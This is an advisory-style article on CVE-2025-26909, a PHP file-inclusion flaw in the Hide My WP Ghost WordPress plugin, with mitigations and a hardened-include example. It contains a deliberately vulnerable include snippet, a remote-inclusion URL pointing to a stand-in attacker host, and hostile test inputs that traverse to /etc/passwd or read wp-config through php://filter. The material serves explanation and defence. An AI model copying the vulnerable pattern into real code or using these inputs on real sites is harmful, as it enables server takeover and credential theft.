A vulnerability was recently disclosed in the WordPress plugin Hide My WP Ghost (vendor: John Darrel). The plugin, installed on thousands of sites, rewrites and hides the default WordPress paths (login and admin URLs, theme and plugin directories, and similar) so that scanners and attackers have a harder time fingerprinting and targeting a WordPress installation.

The vulnerability, assigned CVE-2025-26909, is classified as 'Improper Control of Filename for Include/Require Statement in PHP Program (PHP Remote File Inclusion)', CWE-98. File inclusion flaws are dangerous because PHP executes whatever it includes: an attacker who can steer the include/require path to a file under their control, either one already on the server (local inclusion) or, where the PHP configuration permits URL includes, one hosted on their own server (remote inclusion), gains arbitrary code execution in the web server's context. Administrators running Hide My WP Ghost should update to a fixed release without delay.

Affected Versions:
- Hide My WP Ghost: all versions up to and including 5.4.01 (no lower bound is given, so treat every earlier release as affected)

Exploit Details

The issue arises because the filename passed to an "include" or "require" statement is not properly controlled by the PHP code. An attacker who can influence that filename points it at a file containing PHP code they control, for example a file previously uploaded to the server (or placed somewhere PHP can read, such as a log or session file), or a file on a remote host if URL includes are enabled. Once the file is included it is executed as PHP on the hosting server, giving the attacker arbitrary code execution and, from there, full control of the site and its database credentials.

Below is an illustrative snippet of the vulnerable pattern. It is a textbook example of the weakness class, not the plugin's actual source code:

<?php
// Deliberately vulnerable: the include target is taken straight from the query string.
if (isset($_GET['file'])) {
    $file = $_GET['file'];   // attacker-controlled, no validation or allowlisting
} else {
    $file = 'default.php';
}

// Whatever $file points to is parsed and executed as PHP.
include($file);

In this example the filename used in the "include" statement comes directly from user input, so the attacker fully controls what gets executed. By changing the 'file' parameter of an HTTP GET request they can include a PHP file already present on the target (local file inclusion, typically combined with "../" traversal or a file they managed to upload), or, if allow_url_include is enabled in the PHP configuration, a PHP file hosted on a server they control (remote file inclusion).

To exploit the remote variant, an attacker crafts a URL such as:

https://vulnerablewebsite.com/vulnerablepage.php?file=https://attackerwebsite.com/maliciousfile.php

When that URL is requested, PHP fetches the attacker's file over HTTP and executes it on the vulnerable server with the web server's privileges, letting the attacker run commands, read wp-config.php, or install a persistent backdoor. Note that remote inclusion only works when allow_url_include is On (it is Off by default, and the directive is deprecated as of PHP 7.4); a local file inclusion against the same code path does not need that setting and is usually the more realistic attack on a hardened host.
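The snippet above shows the weakness; the following is an added example (not code from the plugin or the advisory) of the two usual ways to fix it: resolving a request parameter through a fixed allowlist so no user data ever reaches the filesystem, or accepting a simple name and proving with realpath() that the resolved file stays inside a known directory. The directory layout, the 'page' parameter and the sample inputs are all constructed for the demonstration.

```php
<?php
// Added example, not from Hide My WP Ghost: hardened replacements for
// "include($_GET['file'])". Directory, parameter name and inputs are assumptions.

declare(strict_types=1);

/**
 * Approach 1: allowlist. The request only selects a key; the path is fixed
 * server-side. Returns the absolute path to include, or null for unknown keys.
 */
function resolveAllowlisted(string $key, array $allowlist): ?string
{
    return array_key_exists($key, $allowlist) ? $allowlist[$key] : null;
}

/**
 * Approach 2: containment. Accept a bare name, append ".php" ourselves, and
 * require realpath() to place the result inside $baseDir. This rejects URLs,
 * stream wrappers (php://, data://), "../" traversal and null bytes.
 */
function resolveContained(string $name, string $baseDir): ?string
{
    // Only letters, digits, underscore and hyphen; no dots, slashes or schemes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $base      = realpath($baseDir);
    $candidate = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $candidate === false) {
        return null; // directory or file does not exist
    }
    // realpath() has resolved symlinks and "..": the result must start with $base/.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed demo environment: a temp directory holding one legitimate template.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
file_put_contents($dir . '/default.php', "<?php echo \"default template\\n\";\n");

$allowlist = ['home' => $dir . '/default.php'];

// Constructed attacker inputs: only the first one should resolve.
$attempts = [
    'default',
    '../../../../etc/passwd',
    'https://attackerwebsite.com/maliciousfile.php',
    'php://filter/convert.base64-encode/resource=wp-config',
    "default\0.txt",
];
foreach ($attempts as $input) {
    $resolved = resolveContained($input, $dir);
    printf("%-62s -> %s\n", json_encode($input),
        $resolved === null ? 'REJECTED' : 'include ' . basename($resolved));
}

// Production-style use of the allowlist: unknown keys get a 404, never an include.
$file = resolveAllowlisted($_GET['page'] ?? 'home', $allowlist);
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;

// Demo cleanup.
unlink($dir . '/default.php');
rmdir($dir);
```

Run it from the command line (php example.php) and every hostile input prints REJECTED while the legitimate template is included. The allowlist form is preferable when the set of includable files is small and known, because the filesystem never sees user input at all; the containment form is the fallback when names really must be dynamic. Neither fix depends on allow_url_include being Off, but keeping that directive Off remains a sensible defence-in-depth setting.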

Official References

The vulnerability has been published by multiple sources and is officially documented at:

- CVE Database
- National Vulnerability Database (NVD)

Mitigations

If you use the Hide My WP Ghost plugin, update it to the latest release immediately: the plugin author has published a fix for the affected versions, and installing it removes the vulnerable code path. As defence in depth, confirm that allow_url_include is Off in your PHP configuration (its default); this blocks the remote-inclusion variant, although it does not protect against local file inclusion, so it is no substitute for the update.

Keep all your WordPress plugins up-to-date and regularly monitor security announcements from plugin authors, as well as official sources like the CVE Database and the National Vulnerability Database.

Conclusion

CVE-2025-26909 in Hide My WP Ghost is a reminder that security plugins themselves become attack surface, and that a single unchecked include can hand an attacker the whole server. Update the plugin immediately if you run an affected version, and keep monitoring your other plugins for security releases.

Timeline

Published on: 03/27/2025 16:15:30 UTC
Last modified on: 03/27/2025 16:45:12 UTC